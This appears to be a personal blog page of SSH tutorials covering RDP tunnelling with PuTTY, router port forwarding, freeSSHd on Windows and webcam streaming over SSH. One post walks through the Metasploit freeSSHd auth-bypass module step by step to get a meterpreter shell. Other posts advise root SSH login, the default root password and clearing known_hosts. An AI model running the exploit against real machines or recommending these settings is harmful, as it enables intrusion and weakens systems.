JohnKlann / Posts tagged "ssh"

How To: RDP Over SSH

So I have been using RDP over SSH for about the last year and I have found its stability to be much better than Logmein, teamviewer, VNC, and many others. While this method may not have all the fancy features that these other tools have, there is less lag, better performance overall, its free, its secure, and there is no middle server its direct point to point!


  1. SSHD server running on the windows machine you would like to RDP into. I would suggest using Cygwin rather than FreeSSHD due to security exploits.
  2. RDP/Remote Desktop Connections enable on this server. (This will be covered)
  3. The ability to setup port forwarding on your external router. Setup Forwarding
  4. The external IP Address of the network your server is connected to. Your IP
  5. Putty Client

Part One: Setting up the Windows Server.

Once you have a ssh server up and configured the next step is to enable RDP on your windows server.

  1. Open the start menu , right click on computer and select properties.



  2. In the properties window in the top left pane select remote settings.
  3. In the new “System Properties” window under the Remote tab check the box labeled “Allow Remote Assistance connections to this computer”
  4. Next in the same window  under the Remote Desktop section, select  “Allow connections from computers running any version of Remote Desktop” option.
  5. Then click “apply” , then “ok”.



Part Two: Setting up the Client machine for connection.

Once you have downloaded and opened the putty client it is time to set up the ssh session and tunnels.

  1. One the main putty page enter the external IP Address of your windows server the box labeled “Host Name (or IP address)”.



  2. In the left pane of the putty utility expand the SSH node and select Tunnels.
  3. In the box labeled “Source Port” enter a free port on your local system. For this I will use port 1234 as it is normally free.
  4. In the box labeled “Destination” enter the local IP address of your windows server followed by “:3389” the port for RDP.
  5. Leave the default settings below this set to “local” and “Auto”.
  6. Then Select “Add”.



  7. Now select the main putty page in the left pane at the very top labeled “Session”.
  8. In the “Saved Sessions” box enter a name you would like to save your configuration. as so you do not have to set this up again.
  9. Then press “Save”.



  10. Note: To open this session in the future select it from the list and select “Load”
  11. Then Select “Open” This will start the SSH session.
  12. Now for the final steps to open the RDP session. Open the start menu and search for “Remote Desktop Connection” and then open it.



  13. Then in the box labeled “Computer” enter Localhost: followed by the port selected to use in the putty configuration. In this case port 1234.
  14. Then Select Connect.



  15. Now it will prompt you with a credentials box. Just enter your account information and select “OK”.



  16. And Now you have a RDP Session over SSH!





Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.



start: mfsconsole in kali



search: ssh



copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options



run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]



run: exploit



Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

port forward config router

How to: Setup Port Forwarding For SSH

Port forwarding will allow you to connect to your SSH server from anywhere, and it is really easy to do.


Administrator access to your router
Putty client

Step 1: Login to router

Login to your router via a web browser using its IP address (default is

router browser login

Next you locate where you can setup port forwarding. In my case it is under  Applications & Gaming sub tab Single Port Forwarding.

Once located create a custom forward with the following settings:

Internal port: 22
IP address of your SSH server.

Save the settings.

port forward config router

Step 2: Get your external IP address

You can find your external IP address by visiting

 *Note: Unless you have a static IP provisioned by your ISP, your external IP address will most likely change often. There are several services that allow you to track the change, and assign a domain name to it (Never had much luck with them). I went with a much more simple approach. View the article here.

Step 3: Creating your first external connection

From computer outside your LAN open your putty client.
Enter your external IP address into the Hosts field and click open.

putty setup ext ssh session
If you receive a popup box like the following select yes to continue:

rsa key working ssh
Enter your username and password:

ssh login
Then you will receive a shell on the SSH server:

secure shell on remote ssh server

Related Articles:


How to: Setup a SSH Server on Windows

This How to will walkthrough the steps to setting up an free ssh server on Windows operating systems. The will allow ssh access (secure shell access) to windows command prompt, and provide you with the ability to utilize other tools like Putty(tunneling), and WinSCP(file transfers). This walk through will show you how to set this up within your LAN (Local Area Network).


SSH server software — For the use of this tutorial, freesshd will be used.
Putty client — ssh client

Step 1: Install freesshd

freesshd installer

Step 2: Configure freesshd

Once you have finished installing the ssh server, run the application. You will want to edit the settings:

Right click on the freesshd icon in the taskbar and select settings

freesshd taskbar settings

You may see that the ssh server is not running and it may not start when you attempt to start it. Do not fret your machine probably needs a reboot. However ever this can wait until after the configuration has finished. For the next steps we want the SSH server to be stopped.

freesshd server status

Most of the defaults are effective there is only one last thing to configure.

Select the Users tab and click add user:

freesshd add user

Add your windows user account name under login. If you are not attached to a domain just leave the domain field blank.
Then select the user permissions. (personally I selected them all.)
Select ok.

Now start your SSH server on the Server status tab. Reminder if it will not start remember to reboot your machine and try to start it again.

Step 3: Create your first SSH session.

Collect you computers ip address:
Press windows key + r.
Type cmd into the run dialogue box and hit enter.

run dialogue command prompt

In the command prompt type ipconfig and press enter. Your ip address will be listed under your adapter.

finding your ip address cmd ipconfig

From another computer on your LAN (local area network) download and run the putty client.

Type in your ip address of the SSH server then select open

putty setup for simple ssh session to windows

This will then prompt you for your user name and password. *Note: it will show nothing when you type your password in. Once complete this will open a Command Prompt Shell on the remote system.

ssh windows command prompt shell

Related articles:

How to transfer files to and from a windows server using ssh with WinSCP

How to setup port forwarding for ssh


How to Stream a Webcam through SSH with VLC on Backtrack 5 R3 Gnome 32


You will want to perform Steps 1 and 2 on both the server and the client.
Step 1: Install VLC and Fix it for Backtrack 5 

apt-get install vlc

hexedit /usr/bin/vlc

Press tab

replace geteuid._libc_start_main with getppid._libc_start_main



vlc “and it should now work”

Step 2: Setting up ssh “if you have never used it”

nano /etc/ssh/sshd_config

Add the following Lines or un-comment them if they are already there.

PermitRootLogin yes
UsePrivilegeSeparation yes

X11Forwarding yes
X11DisplayOffset 10
TCPKeepAlive yes

UsePAM yes

If you have not used ssh before you will need to generate keys run commands below:

Enter file in which to save the key (/root/.ssh/id_rsa):

Enter file in which to save the key (/root/.ssh/id_rsa):

Step 3: Now you will need to start ssh by running the command below:

start ssh

Step 4: Now that everything is setup lets start the webcam stream:

ssh -C -X root@serverip -L 9091:localhost:9091
“backtrack’s default is: toor”

Note: If you get an error about the SSH keys not matching.

gedit /root/.ssh/known_hosts

Then delete everything and save the file.

Then run the command below:

vlc v4l2:// :v4l2-dev=/dev/video0 :v4l2-adev=/dev/dsp :v4l2-standard=0 :sout="#transcode{vcodec=mp4v,vb=800,scale=1,acodec=mpga,ab=128, channels=2}:duplicate{dst=std{access=http,mux=ts,dst=localhost:9091}}"

Now open a new terminal and run this command:

vlc http://localhost:9091